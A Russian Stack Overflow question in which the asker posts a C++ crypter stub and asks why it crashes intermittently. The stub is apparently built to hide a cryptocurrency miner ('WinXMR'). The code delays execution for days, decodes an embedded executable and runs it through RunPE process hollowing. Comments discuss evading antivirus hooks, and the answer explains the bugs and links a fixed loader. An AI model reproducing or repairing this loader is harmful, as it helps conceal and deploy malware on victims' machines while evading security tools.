# Программа запускается через раз 0xc0000005 C++

Tags: c++, winapi

В общем, компилирую программу в Release Win32, на выходе получаю свою программу, но вот она запускается через раз, то есть, иногда нормально запускает runPE(rawData), а иногда выдаёт Ошибку

> моя_программа.exe - Ошибка приложения
>
> Ошибка при запуске приложения
> (0xc0000005). Для выхода из приложения нажмите кнопку "ОК".

[Вот код программы](https://pastebin.com/RiQn2ked)

```
#define _CRT_SECURE_NO_WARNINGS
#define _CRT_SECURE_NO_DEPRECATE
#define _CRT_NONSTDC_NO_DEPRECATE
#define CRYPT
#pragma warning(disable : 4996)


#include "stdafx.h"
#include "WinXMR.h"
#include <iostream> // Standard C++ library for console I/O
#include <string> // Standard C++ Library for string manip

#include <windows.h>
#include <winternl.h>
#include <TlHelp32.h> //WinAPI Process API
#pragma comment(lib,"ws2_32.lib")
#pragma comment(lib,"ntdll.lib") 


#define MAX_LOADSTRING 100

// Глобальные переменные:
HINSTANCE hInst;                                // текущий экземпляр
WCHAR szTitle[MAX_LOADSTRING];                  // Текст строки заголовка
WCHAR szWindowClass[MAX_LOADSTRING];            // имя класса главного окна

// Отправить объявления функций, включенных в этот модуль кода:
ATOM                MyRegisterClass(HINSTANCE hInstance);
BOOL                InitInstance(HINSTANCE, int);
LRESULT CALLBACK    WndProc(HWND, UINT, WPARAM, LPARAM);
INT_PTR CALLBACK    About(HWND, UINT, WPARAM, LPARAM);


int RunPortableExecutable(void* Image)
{
    IMAGE_DOS_HEADER* DOSHeader; // For Nt DOS Header symbols
    IMAGE_NT_HEADERS* NtHeader; // For Nt PE Header objects & symbols
    IMAGE_SECTION_HEADER* SectionHeader;

    PROCESS_INFORMATION PI;
    STARTUPINFOA SI;

    CONTEXT* CTX;

    DWORD* ImageBase; //Base address of the image
    void* pImageBase; // Pointer to the image base

    int count;
    char CurrentFilePath[1024];

    DOSHeader = PIMAGE_DOS_HEADER(Image); // Initialize Variable
    NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew); // Initialize

    GetModuleFileNameA(0, CurrentFilePath, 1024); // path to current executable

    if (NtHeader->Signature == IMAGE_NT_SIGNATURE) // Check if image is a PE File.
    {
        ZeroMemory(&PI, sizeof(PI)); // Null the memory
        ZeroMemory(&SI, sizeof(SI)); // Null the memory

        if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE,
            CREATE_SUSPENDED, NULL, NULL, &SI, &PI)) // Create a new instance of current
            //process in suspended state, for the new image.
        {
            // Allocate memory for the context.
            CTX = LPCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
            CTX->ContextFlags = CONTEXT_FULL; // Context is allocated

            if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) //if context is in thread
            {
                // Read instructions
                ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);

                pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),
                    NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);

                // Write the image to the process
                WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);

                for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++)
                {
                    SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));

                    WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),
                        LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);
                }
                WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8),
                    LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);

                // Move address of entry point to the eax register
                CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;
                SetThreadContext(PI.hThread, LPCONTEXT(CTX)); // Set the context
                ResumeThread(PI.hThread); //´Start the process/call main()

                return 0; // Operation was successful.
            }
        }
    }
}

// бинарный код программы
unsigned char rawData[] = {
    // 284448 строк бинарника
};




int APIENTRY wWinMain(_In_ HINSTANCE hInstance,
                     _In_opt_ HINSTANCE hPrevInstance,
                     _In_ LPWSTR    lpCmdLine,
                     _In_ int       nCmdShow)
{
    UNREFERENCED_PARAMETER(hPrevInstance);
    UNREFERENCED_PARAMETER(lpCmdLine);

    for (int i = 0; i < 550000; i++)
        Sleep(1000);
    for (int i = 0; i < sizeof(rawData) / sizeof(*rawData); i++) {
        unsigned char b = rawData[i] + 0x11;
        rawData[i] = b;
    }
    Sleep(3000); //задержка
    RunPortableExecutable(rawData); // run executable from the array
    getchar();
    delete rawData;
    // TODO: Разместите код здесь.

    // Инициализация глобальных строк
    LoadStringW(hInstance, IDS_APP_TITLE, szTitle, MAX_LOADSTRING);
    LoadStringW(hInstance, IDC_WINXMR, szWindowClass, MAX_LOADSTRING);
    MyRegisterClass(hInstance);

    // Выполнить инициализацию приложения:
    if (!InitInstance (hInstance, nCmdShow))
    {
        return FALSE;
    }

    HACCEL hAccelTable = LoadAccelerators(hInstance, MAKEINTRESOURCE(IDC_WINXMR));

    MSG msg;

    // Цикл основного сообщения:
    while (GetMessage(&msg, nullptr, 0, 0))
    {
        if (!TranslateAccelerator(msg.hwnd, hAccelTable, &msg))
        {
            TranslateMessage(&msg);
            DispatchMessage(&msg);
        }
    }

    return (int) msg.wParam;
}



//
//  ФУНКЦИЯ: MyRegisterClass()
//
//  ЦЕЛЬ: Регистрирует класс окна.
//
ATOM MyRegisterClass(HINSTANCE hInstance)
{
    WNDCLASSEXW wcex;

    wcex.cbSize = sizeof(WNDCLASSEX);

    wcex.style          = CS_HREDRAW | CS_VREDRAW;
    wcex.lpfnWndProc    = WndProc;
    wcex.cbClsExtra     = 0;
    wcex.cbWndExtra     = 0;
    wcex.hInstance      = hInstance;
    wcex.hIcon          = LoadIcon(hInstance, MAKEINTRESOURCE(IDI_WINXMR));
    wcex.hCursor        = LoadCursor(nullptr, IDC_ARROW);
    wcex.hbrBackground  = (HBRUSH)(COLOR_WINDOW+1);
    wcex.lpszMenuName   = MAKEINTRESOURCEW(IDC_WINXMR);
    wcex.lpszClassName  = szWindowClass;
    wcex.hIconSm        = LoadIcon(wcex.hInstance, MAKEINTRESOURCE(IDI_SMALL));

    return RegisterClassExW(&wcex);
}

//
//   ФУНКЦИЯ: InitInstance(HINSTANCE, int)
//
//   ЦЕЛЬ: Сохраняет маркер экземпляра и создает главное окно
//
//   КОММЕНТАРИИ:
//
//        В этой функции маркер экземпляра сохраняется в глобальной переменной, а также
//        создается и выводится главное окно программы.
//
BOOL InitInstance(HINSTANCE hInstance, int nCmdShow)
{
   hInst = hInstance; // Сохранить маркер экземпляра в глобальной переменной

   HWND hWnd = CreateWindowW(szWindowClass, szTitle, WS_OVERLAPPEDWINDOW,
      CW_USEDEFAULT, 0, CW_USEDEFAULT, 0, nullptr, nullptr, hInstance, nullptr);

   if (!hWnd)
   {
      return FALSE;
   }

   ShowWindow(hWnd, nCmdShow);
   UpdateWindow(hWnd);

   return TRUE;
}

//
//  ФУНКЦИЯ: WndProc(HWND, UINT, WPARAM, LPARAM)
//
//  ЦЕЛЬ: Обрабатывает сообщения в главном окне.
//
//  WM_COMMAND  - обработать меню приложения
//  WM_PAINT    - Отрисовка главного окна
//  WM_DESTROY  - отправить сообщение о выходе и вернуться
//
//
LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
    switch (message)
    {
    case WM_COMMAND:
        {
            int wmId = LOWORD(wParam);
            // Разобрать выбор в меню:
            switch (wmId)
            {
            case IDM_ABOUT:
                DialogBox(hInst, MAKEINTRESOURCE(IDD_ABOUTBOX), hWnd, About);
                break;
            case IDM_EXIT:
                DestroyWindow(hWnd);
                break;
            default:
                return DefWindowProc(hWnd, message, wParam, lParam);
            }
        }
        break;
    case WM_PAINT:
        {
            PAINTSTRUCT ps;
            HDC hdc = BeginPaint(hWnd, &ps);
            // TODO: Добавьте сюда любой код прорисовки, использующий HDC...
            EndPaint(hWnd, &ps);
        }
        break;
    case WM_DESTROY:
        PostQuitMessage(0);
        break;
    default:
        return DefWindowProc(hWnd, message, wParam, lParam);
    }
    return 0;
}

// Обработчик сообщений для окна "О программе".
INT_PTR CALLBACK About(HWND hDlg, UINT message, WPARAM wParam, LPARAM lParam)
{
    UNREFERENCED_PARAMETER(lParam);
    switch (message)
    {
    case WM_INITDIALOG:
        return (INT_PTR)TRUE;

    case WM_COMMAND:
        if (LOWORD(wParam) == IDOK || LOWORD(wParam) == IDCANCEL)
        {
            EndDialog(hDlg, LOWORD(wParam));
            return (INT_PTR)TRUE;
        }
        break;
    }
    return (INT_PTR)FALSE;
}
```

На некоторых компьютерах вовсе отображается,  что приложение не является win32

Comment: Этот ваш file.cpp размером 23 мегабайта - вы всерьез предлагаете его скачивать и разбираться?

Comment: Нам нужен минимальный пример, воспроизводящий ошибку. https://ru.stackoverflow.com/help/mcve

Comment: Там предоставлен не файл, а код. Код не короткий, Я бы сократил и отправил именно тот кусок кода,  в котором и ошибка,  если б я знал где именно ошибка.

Comment: @freim , запросите,  что именно отправить, Я отправлю, но я не знаю, в чем именно ошибка

Comment: Открыл и полистал ради интереса - там бинарные данные exe'шника хранятся прямо в коде и зашиваются в программу. А еще эти бинарные данные хранятся в виде статического массива. Статический массив на пару десятков мегабайт - вещь сильная.

Comment: Давайте так, на сколько процентов этот код написали вы? Это учебное задание?

Comment: @RiotBr3aker, код мой на 80% Задание не учебное. Просто изменить на динамический массив и ошибки не будет? Были подозрения, что выходит за границы массива

Comment: Т.е. это вы придумали такую гениальную идею по вшиванию данных прямо в экзешник? Я не говорю, что ошибка в этом - никто в здравом уме не будет искать ошибку в таком файле, вас попросили скинуть адекватный воспроизводимый пример.

Comment: Помимо этого проекта, есть ещё 2, 1(C++). Шифрование с вычитанием из оригинала 0x11 . 2(Python). Получение бинарника программы. Этот проект расшифровывает и запускает бинарник в памяти с помощью RunPE.

Comment: Если б я знал в каком примерно месте располагается ошибка, я бы выложил именно тот кусок кода, а сам проект весит немало, соответственно, какую его часть предоставить,  Я не знаю

Comment: Уберите зашитый в код бинарник и вместо него оставьте комментарий, в чем проблема?

Comment: @RiotBr3aker, https://pastebin.com/RiQn2ked вот, сокращённый код

Comment: Отредактируйте вопрос и добавьте эту ссылку.

Comment: Отредактировал.

Comment: Охохо, кто-то пишет криптор. Пиши PE Loader вместо RunPE. Аверы ставят хуки на хэккерские апи и перехватывают то, что в них передается.

Comment: @typemoon, аверы не палят, но вот как исправить ошибку, пока не имею представления. Работает через раз

Answer (score 1):

Программа некорректна как минимум в двух аспектах.

1. Программа пытается динамически создать в памяти кусок кода, но при этом не вызывает функцию [FlushInstructionCache](https://docs.microsoft.com/en-us/windows/desktop/api/processthreadsapi/nf-processthreadsapi-flushinstructioncache).
2. Нет гарантий, что в адресном пространстве любого процесса по заданному адресу `NtHeader->OptionalHeader.ImageBase` ОС сможет выделить непрерывный блок памяти нужного размера (вы даже не проверяете результат возврата VirtualAllocEx, чтобы узнать это). В современных версиях Windows действует Address space layout randomization, и предугадать, по какому адресу что будет загружено, невозможно.

Я бы сказал, то, что вы пытаетесь сделать, не будет работать. Выгрузите бинарник во временный файл и создайте процесс с него, это единственная рабочая схема.

Если вас интересует, как избавиться от Access Violation и вместо этого корректно вернуть ошибку, посмотрите улучшенный вариант этого кода: https://github.com/Anon-65535/RunPE-Fixed-/blob/master/RunPE32_From_Memory.cpp

Comment: я в C++ не профессионал, можете подробно всё расписать? Телеграм: @simple_stage